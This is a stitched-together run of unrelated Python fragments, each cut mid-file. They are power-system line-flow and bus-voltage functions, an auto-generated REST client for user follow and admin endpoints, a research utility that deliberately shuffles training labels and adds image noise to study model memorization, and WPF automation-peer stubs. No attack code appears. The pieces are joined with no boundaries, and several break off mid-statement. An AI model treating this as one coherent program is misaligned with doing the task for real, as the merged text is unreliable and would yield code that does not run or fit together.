(j_buses) Apparent Power (S_ij) Active Power (P_ij) Reactive Power (Q_ij) Violation Occurrence (violation) """ def LineFlowResults (sys_Data, LineData, sys_Y): LD_val = LineData.values S_ij = [] P_ij = [] Q_ij = [] i_buses = LD_val[0:,0] j_buses = LD_val[0:,1] violation = [] for i in range (0, len(LineData)): B_tot = (LD_val[i:i+1,4]) V_i = sys_Data[(int(LD_val[i:i+1,0]))-1:(int(LD_val[i:i+1,0])),1] T_i = sys_Data[(int(LD_val[i:i + 1, 0])) - 1:(int(LD_val[i:i + 1, 0])), 2] V_j = sys_Data[(int(LD_val[i:i + 1, 1])) - 1:(int(LD_val[i:i + 1, 1])), 1] T_j = sys_Data[(int(LD_val[i:i + 1, 1])) - 1:(int(LD_val[i:i + 1, 1])), 2] y_ij = -1 * ( sys_Y[(int(LD_val[i:i + 1, 0]) - 1):(int(LD_val[i:i + 1, 0])), (int(LD_val[i:i + 1, 1]) - 1)]) PowerFlow(V_i, T_i, V_j, T_j, B_tot, y_ij) s_ij, p_ij, q_ij = PowerFlow(V_i,T_i,V_j,T_j,B_tot,y_ij) if s_ij*100 < (LD_val[i:i+1,5]): violation.append('FALSE') else: violation.append('TRUE') S_ij.append(100 * float(s_ij)) P_ij.append(100 * float(p_ij)) Q_ij.append(100 * float(q_ij)) return S_ij, P_ij, Q_ij, violation, i_buses, j_buses """ Collects needed bus data from sys_Data Returns lists: Bus Number (bus_nums) Bus Voltages (bus_v) Bus Thetas (bus_deg) Bus Active Power (bus_p) Bus Reactive Power (bus_q) Reactive Power (Q_ij) Voltage Violation Occurrence (V_violate) """ def BusResults(sys_Data): V_violate = [] for i in range (0,len(sys_Data)): if (sys_Data[i:i+1,1] <= 1.05 and sys_Data[i:i+1,1] >= 0.95): V_violate.append('FALSE') else: V_violate.append('TRUE') bus_nums = sys_Data[0:,0] bus_v = sys_Data[0:,1] bus_deg = 180* sys_Data[0:,2] / np.pi bus_p = 100 * sys_Data[0:,3] bus_q = 100 * sys_Data[0:,5] return bus_nums.astype(int), bus_v, bus_deg, bus_p, bus_q, V_violate """ Collects the filename, sys_Data, LineData, sys_Y,
) kwargs['_check_input_type'] = kwargs.get( '_check_input_type', True ) kwargs['_check_return_type'] = kwargs.get( '_check_return_type', True ) kwargs['_spec_property_naming'] = kwargs.get( '_spec_property_naming', False ) kwargs['_content_type'] = kwargs.get( '_content_type') kwargs['_host_index'] = kwargs.get('_host_index') kwargs['session_token'] = \ session_token kwargs['uid'] = \ uid kwargs['uid_list'] = \ uid_list return self.v1_user_uid_follow_post_endpoint.call_with_http_info(**kwargs) def v1_user_uid_followers_get( self, session_token, uid, **kwargs ): """Returns the list of followers for a specific user # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = pod_api.v1_user_uid_followers_get(session_token, uid, async_req=True) >>> result = thread.get() Args: session_token (str): Session authentication token. uid (int): User ID as a decimal integer of the user we want to get the followers list Keyword Args: limit (int): This is the maximum number of objects that may be returned.. [optional] before (str): Returns results from an opaque “before” cursor value as presented via a response cursor.. [optional] after (str): Returns results from an opaque “after” cursor value as presented via a response cursor.. [optional] _return_http_data_only (bool): response data without head status code and headers. Default is True. _preload_content (bool): if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. _request_timeout (int/float/tuple): timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. Default is None. _check_input_type (bool): specifies if type checking should be done one the data sent to the server. Default is True. _check_return_type (bool): specifies if type checking should be done one the data received from the server. Default is True. _spec_property_naming (bool): True if the variable names in the input data are serialized names, as specified in the OpenAPI document. False if the variable names in the input data are pythonic names, e.g. snake case (default) _content_type (str/None): force body content-type. Default is None and content-type will be predicted by allowed content-types and body. _host_index (int/None): specifies the index of the server that we want to use. Default is read from the configuration. async_req (bool): execute request asynchronously Returns: FollowersListResponse If the method is called asynchronously, returns the request thread. """ kwargs['async_req'] = kwargs.get( 'async_req', False ) kwargs['_return_http_data_only'] = kwargs.get( '_return_http_data_only', True ) kwargs['_preload_content'] = kwargs.get( '_preload_content', True ) kwargs['_request_timeout'] = kwargs.get( '_request_timeout', None ) kwargs['_check_input_type'] = kwargs.get( '_check_input_type', True ) kwargs['_check_return_type'] = kwargs.get( '_check_return_type', True ) kwargs['_spec_property_naming'] = kwargs.get( '_spec_property_naming', False ) kwargs['_content_type'] = kwargs.get( '_content_type') kwargs['_host_index'] = kwargs.get('_host_index') kwargs['session_token'] = \ session_token kwargs['uid'] = \ uid return self.v1_user_uid_followers_get_endpoint.call_with_http_info(**kwargs) def v1_user_uid_following_get( self, session_token, uid, **kwargs ): """Returns the list of users that a specific user is following # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = pod_api.v1_user_uid_following_get(session_token, uid, async_req=True) >>> result = thread.get() Args: session_token (str): Session authentication token. uid (int): User ID as a decimal integer of the user we want to get the following list Keyword Args: limit (int): This is the maximum number of objects that may be returned.. [optional] before (str): Returns results from an opaque “before” cursor value as presented via a response cursor.. [optional] after (str): Returns results from an opaque “after” cursor value as presented via a response cursor.. [optional] _return_http_data_only (bool): response data without head status code and headers. Default is True. _preload_content (bool): if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. _request_timeout (int/float/tuple): timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. Default is None. _check_input_type (bool): specifies if type checking should be done one the data sent to the server. Default is True. _check_return_type (bool): specifies if type checking should be done one the data received from the server. Default is True. _spec_property_naming (bool): True if the variable names in the input data are serialized names, as specified in the OpenAPI document. False if the variable names in the input data are pythonic names, e.g. snake case (default) _content_type (str/None): force body content-type. Default is None and content-type will be predicted by allowed content-types and body. _host_index (int/None): specifies the index of the server that we want to use. Default is read from the configuration. async_req (bool): execute request asynchronously Returns: FollowingListResponse If the method is called asynchronously, returns the request thread. """ kwargs['async_req'] = kwargs.get( 'async_req', False ) kwargs['_return_http_data_only'] = kwargs.get( '_return_http_data_only', True ) kwargs['_preload_content'] = kwargs.get( '_preload_content', True ) kwargs['_request_timeout'] = kwargs.get( '_request_timeout', None ) kwargs['_check_input_type'] = kwargs.get( '_check_input_type', True ) kwargs['_check_return_type'] = kwargs.get( '_check_return_type', True ) kwargs['_spec_property_naming'] = kwargs.get( '_spec_property_naming', False ) kwargs['_content_type'] = kwargs.get( '_content_type') kwargs['_host_index'] = kwargs.get('_host_index') kwargs['session_token'] = \ session_token kwargs['uid'] = \ uid return self.v1_user_uid_following_get_endpoint.call_with_http_info(**kwargs) def v1_user_uid_unfollow_post( self, session_token, uid, uid_list, **kwargs ): """Make a list of users unfollowing a specific user # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = pod_api.v1_user_uid_unfollow_post(session_token, uid, uid_list, async_req=True) >>> result = thread.get() Args: session_token (str): Session authentication token. uid (int): User ID as a decimal integer of the user to be unfollowed uid_list (FollowersList): List of (integer) User IDs of the followers Keyword Args: _return_http_data_only (bool): response data without head status code and headers. Default is True. _preload_content (bool): if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. _request_timeout (int/float/tuple): timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. Default is None. _check_input_type (bool): specifies if type checking should be done one the data sent to the server. Default is True. _check_return_type (bool): specifies if type checking should be done one the data received from the server. Default is True. _spec_property_naming (bool): True if the variable names in the input data are serialized names, as specified in the OpenAPI document. False if the variable names in the input data are pythonic names, e.g. snake case (default) _content_type (str/None): force body content-type. Default is None and content-type will be predicted by allowed content-types and body. _host_index (int/None): specifies the index of the server that we want to use. Default is read from the configuration. async_req (bool): execute request asynchronously Returns: SuccessResponse If the method is called asynchronously, returns the request thread. """ kwargs['async_req'] = kwargs.get( 'async_req', False ) kwargs['_return_http_data_only'] = kwargs.get( '_return_http_data_only', True ) kwargs['_preload_content'] = kwargs.get( '_preload_content', True ) kwargs['_request_timeout'] = kwargs.get( '_request_timeout', None ) kwargs['_check_input_type'] = kwargs.get( '_check_input_type', True ) kwargs['_check_return_type'] = kwargs.get( '_check_return_type', True ) kwargs['_spec_property_naming'] = kwargs.get( '_spec_property_naming', False ) kwargs['_content_type'] = kwargs.get( '_content_type') kwargs['_host_index'] = kwargs.get('_host_index') kwargs['session_token'] = \ session_token kwargs['uid'] = \ uid kwargs['uid_list'] = \ uid_list return self.v1_user_uid_unfollow_post_endpoint.call_with_http_info(**kwargs) def v2_admin_user_create_post( self, session_token, payload, **kwargs ): """Create a new V2 User # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = pod_api.v2_admin_user_create_post(session_token, payload, async_req=True) >>> result = thread.get() Args: session_token (str): Session authentication token. payload (V2UserCreate): Keyword Args: _return_http_data_only (bool): response data without head status code and headers. Default is True. _preload_content (bool): if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. _request_timeout (int/float/tuple): timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. Default is None. _check_input_type (bool): specifies if type checking should be done one the data sent to the server. Default is True. _check_return_type (bool): specifies if type checking should be done one the data received from the server. Default is True. _spec_property_naming (bool): True if the variable names in the input data are
<reponame>maragraziani/intentionally_flawed_models<gh_stars>1-10 import keras.backend as K import numpy as np import keras.datasets import matplotlib.pyplot as plt import keras #from memorization_utils import * import os from sklearn.linear_model import Ridge import sys sys.path.append('../rcvs_fexps/') sys.path.append('../rcvs_fexps/iMIMIC-RCVs/') sys.path.append('../rcvs_fexps/iMIMIC-RCVs/scripts/') sys.path.append('../rcvs_fexps/iMIMIC-RCVs/scripts/keras_vis_rcv/') #from rcv_utils import * from mnist_utils import * import rcv_utils import PIL from scipy import misc import numpy as np #import tensorflow as tf import argparse import cv2 import h5py """ dataset_utils contains the list of classes and functions used to create the datasets and to add the label perturbations """ class Dataset(): def __init__(self, train_data, val_data, test_data, label_corrupt_p = 0.0, gaussian_noise_f = 0.0, num_classes=46, random_seed = 1): self.x_train = train_data[0] self.x_val = val_data[0] self.x_test = test_data[0] self.y_train = train_data[1] self.y_val = val_data[1] self.y_test = test_data[1] self.num_classes = num_classes self.train_mask = np.zeros(len(self.y_train)) self.seed = random_seed if label_corrupt_p > 0.0: self.label_corrupt(label_corrupt_p) if gaussian_noise_f > 0.0: self.gaussian_noise(gaussian_noise_f) def label_corrupt(self, corrupted): ## NEW VERSION # Corrupts the labels in the training set according to # the specified corruption probability print 'NEW VERS' labels=np.array(self.y_train) #labels = np.reshape(len(labels),1) np.random.seed(self.seed) mask = np.random.rand(len(labels)) <= corrupted #rnd_labels = np.random.choice(self.num_classes, mask.sum()) true_labels = labels[mask] #rnd_labels = np.reshape(rnd_labels, (len(rnd_labels),1)) #labels[mask] = rnd_labels print true_labels print np.shape(true_labels) np.random.shuffle(true_labels) print true_labels print np.shape(true_labels) labels[mask] = true_labels #labels = [int(x) for x in labels] # corruption self.y_train = labels self.train_mask = mask def gaussian_noise(self, gaussian_noise_f): # Adds Gaussian Noise to the images, # matching the real dataset's mean and variance data = np.array(self.x_train) mean = np.mean(data) var = np.std(data) sigma = var**0.5 #import pdb; pdb.set_trace() n_samples, row, col = data.shape mask = np.random.rand(n_samples) <= gaussian_noise_f gaussian = np.random.normal(mean, sigma, (row, col)) gaussian = gaussian.reshape(row, col) noisy_imgs = [x+gaussian for x in data[mask]] data[mask] = noisy_imgs self.x_train = data def check_max_img_size(img_list, source): max_img_width = 0 max_img_height = 0 for img_name in img_list: img_shape = np.asarray(PIL.Image.open('{}/dtd/images/{}'.format(source, img_name))).shape #import pdb; pdb.set_trace() img_height, img_width = img_shape[0], img_shape[1] if img_height>max_img_height: max_img_height = img_height if img_width>max_img_width: max_img_width = img_width return max_img_height, max_img_width def load_split(no, source, textures): print "Loading split no. {}".format(no) train_split_file = '{}/dtd/labels/train{}.txt'.format(source, no) f = open(train_split_file, "r") training_img_names = [line.strip('\n') for line in f.readlines()] #import pdb; pdb.set_trace() val_split_file = '{}/dtd/labels/val{}.txt'.format(source, no) fv = open(val_split_file, "r") validation_img_names = [line.strip('\n') for line in fv.readlines()] test_split_file = '{}/dtd/labels/test{}.txt'.format(source, no) fte = open(test_split_file, "r") testing_img_names = [line.strip('\n') for line in fte.readlines()] all_img_names = training_img_names+validation_img_names+testing_img_names max_height, max_width = check_max_img_size(all_img_names, source) print max_height, max_width ''' training_images = np.zeros((len(training_img_names), 299,299,3), dtype='uint8') validation_images = np.zeros((len(validation_img_names), 299,299,3), dtype='uint8') testing_images = np.zeros((len(testing_img_names), 299,299,3), dtype='uint8') ''' training_images = np.zeros((len(training_img_names), max_height,max_width,4), dtype='uint8') validation_images = np.zeros((len(validation_img_names), 299,299,3), dtype='uint8') testing_images = np.zeros((len(testing_img_names), 299,299,3), dtype='uint8') ''' training_images[:,:,0] +=1 validation_images[:,:,0] +=1 testing_images[:,:,0] +=1 ''' ''' training_images_mask = training_images[:,:,0] validation_images_mask = validation_images[:,:,0] testing_images_mask = testing_images[:,:,0] ''' training_labels = [] validation_labels = [] testing_labels = [] i=0 for img_name in training_img_names[:]: img = PIL.Image.open('{}/dtd/images/{}'.format(source, img_name)) ''' width, height = img.size # Get dimensions left = (width - 299)/2 top = (height - 299)/2 right = (width + 299)/2 bottom = (height + 299)/2 img = img.crop((left, top, right, bottom)) ''' nimg = np.asarray(img) nimg_shape = nimg.shape #import pdb; pdb.set_trace() training_images[i, 0:nimg_shape[0], 0:nimg_shape[1], :3] = nimg training_images[i, 0:nimg_shape[0]:, 0:nimg_shape[1], -1] = 1 #import pdb; pdb.set_trace() #training_images_mask[i, 0:nimg_shape[0], 0:nimg_shape[1], :] = 1 i+=1 training_labels.append(np.argwhere(np.asarray(textures)==img_name.split('/')[0])[0][0]) #print nimg.shape i=0 for img_name in validation_img_names[:]: img = PIL.Image.open('{}/dtd/images/{}'.format(source, img_name)) width, height = img.size # Get dimensions left = (width - 299)/2 top = (height - 299)/2 right = (width + 299)/2 bottom = (height + 299)/2 img = img.crop((left, top, right, bottom)) nimg = np.asarray(img) nimg_shape = nimg.shape validation_images[i, 0:nimg_shape[0], 0:nimg_shape[1], :3]=nimg #validation_images[i, 0:nimg_shape[0], 0:nimg_shape[1], -1]=1 #validation_images_mask[i, 0:nimg_shape[0], 0:nimg_shape[1], :] = 1 i+=1 #validation_images.append(np.argwhere(np.asarray(textures)==img_name.split('/')[0])[0][0]) #validation_images[i]=nimg #i+=1 validation_labels.append(np.argwhere(np.asarray(textures)==img_name.split('/')[0])[0][0]) i=0 for img_name in testing_img_names[:]: img = PIL.Image.open('{}/dtd/images/{}'.format(source, img_name)) width, height = img.size # Get dimensions left = (width - 299)/2 top = (height - 299)/2 right = (width + 299)/2 bottom = (height + 299)/2 img = img.crop((left, top, right, bottom)) nimg= np.asarray(img) nimg_shape = nimg.shape testing_images[i, 0:nimg_shape[0], 0:nimg_shape[1], :3]=nimg #testing_images[i, 0:nimg_shape[0], 0:nimg_shape[1], -1]=1 #testing_images_mask[i, 0:nimg_shape[0], 0:nimg_shape[1], :] = 1 #testing_/\/images[i]=nimg i+=1 testing_labels.append(np.argwhere(np.asarray(textures)==img_name.split('/')[0])[0][0]) return (np.asarray(training_images, dtype='uint8'), training_labels), \ (np.asarray(validation_images, dtype='uint8'), validation_labels), \ (np.asarray(testing_images, dtype='uint8'), testing_labels) #(training_images_mask, validation_images_mask, testing_images_mask) def load_val_split(no, source, textures): print "Loading split no. {}".format(no) val_split_file = '{}/dtd/labels/val{}.txt'.format(source, no) fv = open(val_split_file, "r") validation_img_names = [line.strip('\n') for line in fv.readlines()] validation_images = np.zeros((len(validation_img_names), 299,299,3), dtype='uint8') validation_labels = [] i=0 for img_name in validation_img_names[:]: img = PIL.Image.open('{}/dtd/images/{}'.format(source, img_name)) width, height = img.size # Get dimensions left = (width - 299)/2 top = (height - 299)/2 right = (width + 299)/2 bottom = (height + 299)/2 img = img.crop((left, top, right, bottom)) nimg = np.asarray(img) nimg_shape = nimg.shape validation_images[i, 0:nimg_shape[0], 0:nimg_shape[1], :3]=nimg #validation_images[i, 0:nimg_shape[0], 0:nimg_shape[1], -1]=1 #validation_images_mask[i, 0:nimg_shape[0], 0:nimg_shape[1], :] = 1 i+=1 #validation_images.append(np.argwhere(np.asarray(textures)==img_name.split('/')[0])[0][0]) #validation_images[i]=nimg #i+=1 validation_labels.append(np.argwhere(np.asarray(textures)==img_name.split('/')[0])[0][0]) return (np.asarray(validation_images, dtype='uint8'), validation_labels) ''' Datasets ''' class ImageNet10Random(): ''' Params corrupted: float Default 0.0 num_classes: int Default 10. ''' def __init__(self, label_corrupt_p=0.0, gaussian_noise_f = 0.0, classes=[], path_to_train='', path_to_val='', random_seed=1, **kwargs): (self.x_train, self.y_train), (self.x_test, self.y_test) = get_imgnt_datasets(classes, path_to_train, path_to_val) self.num_classes = len(classes) self._train_mask = np.zeros(len(self.y_train)) self.seed = random_seed if label_corrupt_p > 0.0: self.label_corrupt(label_corrupt_p) if gaussian_noise_f > 0.0: self.gaussian_noise(gaussian_noise_f) def label_corrupt(self, corrupted): # Corrupts the labels in the training set according to # the specified corruption probability labels=np.array(self.y_train) #labels = np.reshape(len(labels),1) np.random.seed(self.seed) mask = np.random.rand(len(labels)) <= corrupted true_labels = labels[mask] print true_labels, np.shape(true_labels) np.random.shuffle(true_labels) print true_labels, np.shape(true_labels) #rnd_labels = np.random.choice(self.num_classes, mask.sum()) #rnd_labels = np.reshape(rnd_labels, (len(rnd_labels),1)) #labels[mask] = rnd_labels labels[mask] = true_labels #labels = [int(x) for x in labels] # corruption self.y_train = labels self.train_mask = mask #saving which labels were actually perturbed def gaussian_noise(self, gaussian_noise_f): # Adds Gaussian Noise to the images, # matching the real dataset's mean and variance data = np.array(self.x_train) mean = np.mean(data) var = np.std(data) sigma = var**0.5 n_samples, row, col, ch = data.shape mask = np.random.rand(n_samples) <= gaussian_noise_f gaussian = np.random.normal(mean, sigma, (row, col, ch)) gaussian = gaussian.reshape(row, col, ch) noisy_imgs = [x+gaussian for x in data[mask]] data[mask] = noisy_imgs self.x_train = data class CIFAR10Random(): ''' Params corrupted: float Default 0.0 num_classes: int Default 10. ''' def __init__(self, label_corrupt_p=0.0, gaussian_noise_f = 0.0, num_classes=10, random_seed=1, **kwargs): #super(CIFAR10Random, self).__init__(**kwargs) (self.x_train, self.y_train), (self.x_test, self.y_test) = keras.datasets.cifar10.load_data() self.num_classes = num_classes #import pdb; pdb.set_trace() self.y_train = self.y_train.T[0] self.y_test = self.y_test.T[0] self._train_mask = np.zeros(len(self.y_train)) #to save which examples were corrupted, if any self.seed = random_seed # note: corruption is performed on the training set. # you test on real data to check generalization if label_corrupt_p > 0.0: self.label_corrupt(label_corrupt_p) if gaussian_noise_f > 0.0: self.gaussian_noise(gaussian_noise_f) def label_corrupt(self, corrupted): ## NEW VERSION # Corrupts the labels in the training set according to # the specified corruption probability print 'NEW VERS' labels=np.array(self.y_train) #labels = np.reshape(len(labels),1) np.random.seed(self.seed) mask = np.random.rand(len(labels)) <= corrupted #rnd_labels = np.random.choice(self.num_classes, mask.sum()) true_labels = labels[mask] #rnd_labels = np.reshape(rnd_labels, (len(rnd_labels),1)) #labels[mask] = rnd_labels print true_labels print np.shape(true_labels) np.random.shuffle(true_labels) print true_labels print np.shape(true_labels) labels[mask] = true_labels #labels = [int(x) for x in labels] # corruption self.y_train = labels self.train_mask = mask ''' # Corrupts the labels in the training set according to # the specified corruption probability labels=np.array(self.y_train) #labels = np.reshape(len(labels),1) np.random.seed(1) mask = np.random.rand(len(labels)) <= corrupted rnd_labels = np.random.choice(self.num_classes, mask.sum()) rnd_labels = np.reshape(rnd_labels, (len(rnd_labels),1)) labels[mask] = rnd_labels labels = [int(x) for x in labels] # corruption self.y_train = labels self.train_mask = mask #saving which labels were actually perturbed ''' def gaussian_noise(self, gaussian_noise_f): # Adds Gaussian Noise to the images, # matching the real dataset's mean and variance data = np.array(self.x_train) mean = np.mean(data) var = np.std(data) sigma = var**0.5 n_samples, row, col, ch = data.shape mask = np.random.rand(n_samples) <= gaussian_noise_f gaussian = np.random.normal(mean, sigma, (row, col, ch)) gaussian = gaussian.reshape(row, col, ch) noisy_imgs = [x+gaussian for x in data[mask]] data[mask] = noisy_imgs self.x_train = data class MNISTRandom(): ''' Params corrupted: float Default 0.0 num_classes: int Default 10. ''' def __init__(self, label_corrupt_p=0.0, gaussian_noise_f = 0.0, num_classes=10, **kwargs): (self.x_train, self.y_train), (self.x_test, self.y_test) = keras.datasets.mnist.load_data() self.num_classes = num_classes # note: corruption is performed on the training set. # you test on real data to check generalization if label_corrupt_p > 0.0: self.label_corrupt(label_corrupt_p) if gaussian_noise_f > 0.0: self.gaussian_noise(gaussian_noise_f)
GetLabeledByCore(self, *args): #cannot find CLR method """ GetLabeledByCore(self: ItemAutomationPeer) -> AutomationPeer Gets the System.Windows.Automation.Peers.AutomationPeer for the System.Windows.Controls.Label that is targeted to the specified System.Windows.UIElement. Returns: The System.Windows.Automation.Peers.LabelAutomationPeer for the element that is targeted by the System.Windows.Controls.Label. """ pass def GetLocalizedControlTypeCore(self, *args): #cannot find CLR method """ GetLocalizedControlTypeCore(self: AutomationPeer) -> str When overridden in a derived class, is called by System.Windows.Automation.Peers.AutomationPeer.GetLocalizedControlType. Returns: The type of the control. """ pass def GetNameCore(self, *args): #cannot find CLR method """ GetNameCore(self: ItemAutomationPeer) -> str Gets the text label of the System.Windows.UIElement that corresponds to the data item in the System.Windows.Controls.ItemsControl.Items collection that is associated with this System.Windows.Automation.Peers.ItemAutomationPeer. Returns: The text label. """ pass def GetOrientationCore(self, *args): #cannot find CLR method """ GetOrientationCore(self: ItemAutomationPeer) -> AutomationOrientation Gets a value that indicates whether the specified System.Windows.UIElement is laid out in a particular direction. Returns: The direction of the specified System.Windows.UIElement. Optionally, the method returns System.Windows.Automation.Peers.AutomationOrientation.None if the System.Windows.UIElement is not laid out in a particular direction. """ pass def GetPattern(self, patternInterface): """ GetPattern(self: ListBoxItemAutomationPeer, patternInterface: PatternInterface) -> object Gets the control pattern for the System.Windows.Controls.ListBoxItem that is associated with this System.Windows.Automation.Peers.ListBoxItemAutomationPeer. patternInterface: One of the enumeration values. Returns: If patternInterface is System.Windows.Automation.Peers.PatternInterface.ScrollItem, this method returns the current instance of this System.Windows.Automation.Peers.ListBoxItemAutomationPeer. """ pass def GetPeerFromPointCore(self, *args): #cannot find CLR method """ GetPeerFromPointCore(self: AutomationPeer, point: Point) -> AutomationPeer """ pass def HasKeyboardFocusCore(self, *args): #cannot find CLR method """ HasKeyboardFocusCore(self: ItemAutomationPeer) -> bool Gets a value that indicates whether the specified System.Windows.UIElement currently has keyboard input focus. Returns: true if the specified System.Windows.UIElement has keyboard input focus; otherwise, false. """ pass def IsContentElementCore(self, *args): #cannot find CLR method """ IsContentElementCore(self: ItemAutomationPeer) -> bool Gets a value that indicates whether the specified System.Windows.UIElement contains data that is presented to the user. Returns: true if the element is a content element; otherwise, false. """ pass def IsControlElementCore(self, *args): #cannot find CLR method """ IsControlElementCore(self: ItemAutomationPeer) -> bool Gets a value that indicates whether the System.Windows.UIElement that is associated with this System.Windows.Automation.Peers.ItemAutomationPeer is understood by the end user as interactive. Returns: true if the element is a control; otherwise, false. """ pass def IsEnabledCore(self, *args): #cannot find CLR method """ IsEnabledCore(self: ItemAutomationPeer) -> bool Gets a value that indicates whether the specified System.Windows.UIElement can receive and send events. Returns: true if the UI Automation�peer can receive and send events; otherwise, false. """ pass def IsKeyboardFocusableCore(self, *args): #cannot find CLR method """ IsKeyboardFocusableCore(self: ItemAutomationPeer) -> bool Gets a value that indicates whether the specified System.Windows.UIElement can accept keyboard focus. Returns: true if the element can accept keyboard focus; otherwise, false. """ pass def IsOffscreenCore(self, *args): #cannot find CLR method """ IsOffscreenCore(self: ItemAutomationPeer) -> bool Gets a value that indicates whether the specified System.Windows.UIElement is off the screen. Returns: true if the specified System.Windows.UIElement is not on the screen; otherwise, false. """ pass def IsPasswordCore(self, *args): #cannot find CLR method """ IsPasswordCore(self: ItemAutomationPeer) -> bool Gets a value that indicates whether the specified System.Windows.UIElement contains protected content. Returns: true if the specified System.Windows.UIElement contains protected content; otherwise, false. """ pass def IsRequiredForFormCore(self, *args): #cannot find CLR method """ IsRequiredForFormCore(self: ItemAutomationPeer) -> bool Gets a value that indicates whether the specified System.Windows.UIElement is required to be completed on a form. Returns: true if the specified System.Windows.UIElement is required to be completed; otherwise, false. """ pass def PeerFromProvider(self, *args): #cannot find CLR method """ PeerFromProvider(self: AutomationPeer, provider: IRawElementProviderSimple) -> AutomationPeer Gets an System.Windows.Automation.Peers.AutomationPeer for the specified System.Windows.Automation.Provider.IRawElementProviderSimple proxy. provider: The class that implements System.Windows.Automation.Provider.IRawElementProviderSimple. Returns: The System.Windows.Automation.Peers.AutomationPeer. """ pass def ProviderFromPeer(self, *args): #cannot find CLR method """ ProviderFromPeer(self: AutomationPeer, peer: AutomationPeer) -> IRawElementProviderSimple Gets the System.Windows.Automation.Provider.IRawElementProviderSimple for the specified System.Windows.Automation.Peers.AutomationPeer. peer: The automation peer. Returns: The proxy. """ pass def SetFocusCore(self, *args): #cannot find CLR method """ SetFocusCore(self: ItemAutomationPeer) Sets the keyboard input focus on the specified System.Windows.UIElement. The System.Windows.UIElement corresponds to the data item in the System.Windows.Controls.ItemsControl.Items collection that is associated with this System.Windows.Automation.Peers.ItemAutomationPeer. """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass @staticmethod # known case of __new__ def __new__(self, owner, selectorAutomationPeer): """ __new__(cls: type, owner: object, selectorAutomationPeer: SelectorAutomationPeer) """ pass IsHwndHost = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Gets a value that indicates whether the element that is associated with this System.Windows.Automation.Peers.AutomationPeer hosts hwnds in Windows Presentation Foundation (WPF). """ class GridViewItemAutomationPeer(ListBoxItemAutomationPeer, IVirtualizedItemProvider, ISelectionItemProvider, IScrollItemProvider): """ Exposes the data items in the collection of System.Windows.Controls.ItemsControl.Items in System.Windows.Controls.GridView types to UI Automation. GridViewItemAutomationPeer(owner: object, listviewAP: ListViewAutomationPeer) """ def GetAcceleratorKeyCore(self, *args): #cannot find CLR method """ GetAcceleratorKeyCore(self: ItemAutomationPeer) -> str Gets the accelerator key for the System.Windows.UIElement that corresponds to the data item in the System.Windows.Controls.ItemsControl.Items collection that is associated with this System.Windows.Automation.Peers.ItemAutomationPeer. Returns: The accelerator key. """ pass def GetAccessKeyCore(self, *args): #cannot find CLR method """ GetAccessKeyCore(self: ItemAutomationPeer) -> str Gets the access key for the System.Windows.UIElement that corresponds to the data item in the System.Windows.Controls.ItemsControl.Items collection that is associated with this System.Windows.Automation.Peers.ItemAutomationPeer. Returns: The access key. """ pass def GetAutomationControlTypeCore(self, *args): #cannot find CLR method """ GetAutomationControlTypeCore(self: GridViewItemAutomationPeer) -> AutomationControlType Gets the control type for the System.Windows.Controls.ItemsControl.Items collection that is associated with this System.Windows.Automation.Peers.GridViewItemAutomationPeer. Called by System.Windows.Automation.Peers.AutomationPeer.GetAutomationControlType. Returns: System.Windows.Automation.Peers.AutomationControlType.DataItem. """ pass def GetAutomationIdCore(self, *args): #cannot find CLR method """ GetAutomationIdCore(self: ItemAutomationPeer) -> str Gets the string that uniquely identifies the System.Windows.UIElement that corresponds to the data item in the System.Windows.Controls.ItemsControl.Items collection that is associated with this System.Windows.Automation.Peers.ItemAutomationPeer. Returns: A string that contains the UI Automation�identifier. """ pass def GetBoundingRectangleCore(self, *args): #cannot find CLR method """ GetBoundingRectangleCore(self: ItemAutomationPeer) -> Rect Gets the System.Windows.Rect that represents the bounding rectangle of the specified System.Windows.UIElement. Returns: The bounding rectangle. """ pass def GetChildrenCore(self, *args): #cannot find CLR method """ GetChildrenCore(self: GridViewItemAutomationPeer) -> List[AutomationPeer] Gets the collection of child elements of the System.Windows.Controls.ItemsControl.Items collection that is associated with this System.Windows.Automation.Peers.GridViewItemAutomationPeer. Called by System.Windows.Automation.Peers.AutomationPeer.GetChildren. Returns: The collection of child elements. """ pass def GetClassNameCore(self, *args): #cannot find CLR method """ GetClassNameCore(self: GridViewItemAutomationPeer) -> str Gets the name of the System.Windows.Controls.ItemsControl.Items collection that is associated with this System.Windows.Automation.Peers.GridViewItemAutomationPeer. Called by System.Windows.Automation.Peers.AutomationPeer.GetClassName. Returns: A string that contains "ListViewItem". """ pass def GetClickablePointCore(self, *args): #cannot find CLR method """ GetClickablePointCore(self: ItemAutomationPeer) -> Point Gets a System.Windows.Point that represents the clickable space that is on the specified System.Windows.UIElement. Returns: The point that represents the clickable space that is on the specified System.Windows.UIElement. """ pass def GetHelpTextCore(self, *args): #cannot find CLR method """ GetHelpTextCore(self: ItemAutomationPeer) -> str Gets the string that describes the functionality of the System.Windows.UIElement that corresponds to the data item in the System.Windows.Controls.ItemsControl.Items collection that is associated with this System.Windows.Automation.Peers.ItemAutomationPeer. Returns: The help text. """ pass def GetHostRawElementProviderCore(self, *args): #cannot find CLR method """ GetHostRawElementProviderCore(self: AutomationPeer) -> HostedWindowWrapper Tells UI Automation where in the UI Automation tree to place the hwnd being hosted by a Windows Presentation Foundation (WPF) element. Returns: This method returns the hosted hwnd to UI Automation for controls that host hwnd objects. """ pass def GetItemStatusCore(self, *args): #cannot find
